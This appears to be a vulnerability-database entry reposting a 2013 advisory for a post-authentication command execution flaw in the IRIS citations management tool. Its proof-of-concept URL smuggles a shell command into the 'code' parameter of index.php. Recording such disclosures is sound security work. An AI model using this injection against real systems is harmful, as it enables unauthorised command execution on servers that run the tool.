IRIS Citations Management Tool Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1045609 漏洞类型
发布时间 2013-02-13 更新时间 2013-02-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013020092
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
A vulnerability exists in IRIS citations management tool which allows a low privileged attacker to execute arbitrary commands.

Details can be found on my blog:
https://infosecabsurdity.wordpress.com/2013/02/09/iris-citations-management-tool-post-auth-remote-command-execution/ 

PoC:

http://[target]/[path]/index.php?p=add&import=spnro&code=a"+-T+0.1+||echo+`id`+>+/tmp/luls||"

~ aeon